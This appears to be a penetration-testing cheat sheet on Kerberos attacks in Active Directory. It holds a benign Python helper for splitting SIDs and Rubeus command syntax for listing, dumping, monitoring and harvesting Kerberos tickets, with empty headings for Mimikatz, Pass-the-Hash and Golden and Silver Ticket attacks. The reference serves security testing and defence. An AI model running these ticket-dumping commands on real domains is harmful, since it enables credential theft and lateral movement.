Kerberos Attacks

Get the current user's SID:

whoami /user

SID: S-1-5-21-2536614405-3629634762-1218571035-1116
Domain SID = S-1-5-21-2536614405-3629634762-1218571035
Domain object (RID) = 1116
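
The split shown above, as an added example that is not part of the original page. It goes slightly beyond the page by also handling the binary form of a SID (as stored in the Active Directory objectSid attribute), which helps when correlating SIDs from LDAP or event logs. The function names are hypothetical.

```python
import struct

# SID from the page's `whoami /user` output.
SAMPLE_SID = "S-1-5-21-2536614405-3629634762-1218571035-1116"

def sid_to_bytes(sid: str) -> bytes:
    """Encode a string SID into the binary layout stored in objectSid."""
    parts = sid.strip().upper().split("-")
    if len(parts) < 3 or parts[0] != "S":
        raise ValueError(f"not a SID: {sid!r}")
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    if len(subs) > 15 or any(not 0 <= s <= 0xFFFFFFFF for s in subs):
        raise ValueError("invalid sub-authority list")
    # revision (1 byte), count (1 byte), authority (6 bytes, big-endian),
    # then each sub-authority as a little-endian 32-bit integer.
    return (struct.pack("BB", revision, len(subs))
            + authority.to_bytes(6, "big")
            + struct.pack(f"<{len(subs)}I", *subs))

def bytes_to_sid(raw: bytes) -> str:
    """Decode a binary SID back to its S-R-A-S... string form."""
    if len(raw) < 8 or len(raw) != 8 + 4 * raw[1]:
        raise ValueError("truncated or malformed binary SID")
    authority = int.from_bytes(raw[2:8], "big")
    subs = struct.unpack(f"<{raw[1]}I", raw[8:])
    return "-".join(["S", str(raw[0]), str(authority), *map(str, subs)])

def split_account_sid(sid: str) -> tuple[str, int]:
    """Return (domain SID, RID) for a domain account SID S-1-5-21-a-b-c-RID."""
    parts = sid.strip().upper().split("-")
    # Well-known SIDs such as S-1-5-18 have no domain part and are rejected.
    if parts[:4] != ["S", "1", "5", "21"] or len(parts) != 8:
        raise ValueError(f"not a domain account SID: {sid!r}")
    return "-".join(parts[:7]), int(parts[7])

if __name__ == "__main__":
    domain_sid, rid = split_account_sid(SAMPLE_SID)
    print("domain SID:", domain_sid)
    print("RID:", rid)
    print("objectSid bytes:", sid_to_bytes(SAMPLE_SID).hex())
```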

Rubeus

.\Rubeus.exe triage
.\Rubeus.exe dump

Ticket enumeration

# Triage all current tickets (if elevated, list for all users), optionally targeting a specific LUID, username, or service:
Rubeus.exe triage [/luid:LOGINID] [/user:USER] [/service:krbtgt] [/server:BLAH.DOMAIN.COM]

# List all current tickets in detail (if elevated, list for all users), optionally targeting a specific LUID:
Rubeus.exe klist [/luid:LOGINID] [/user:USER] [/service:krbtgt] [/server:BLAH.DOMAIN.COM]

# Dump all current ticket data (if elevated, dump for all users), optionally targeting a specific service/LUID:
Rubeus.exe dump [/luid:LOGINID] [/user:USER] [/service:krbtgt] [/server:BLAH.DOMAIN.COM] [/nowrap]

# Monitor every /interval SECONDS (default 60) for new TGTs:
Rubeus.exe monitor [/interval:SECONDS] [/targetuser:USER] [/nowrap] [/registry:SOFTWARENAME] [/runfor:SECONDS]

# Monitor every /monitorinterval SECONDS (default 60) for new TGTs, auto-renew TGTs, and display the working cache every /displayinterval SECONDS (default 1200):
Rubeus.exe harvest [/monitorinterval:SECONDS] [/displayinterval:SECONDS] [/targetuser:USER] [/nowrap] [/registry:SOFTWARENAME] [/runfor:SECONDS]
        

Mimikatz

Ticket enumeration

Pass-The-Hash

Silver Ticket attack

Golden Ticket Attack

Cache tickets

Set the TGT for impacket use

Kirbi tickets
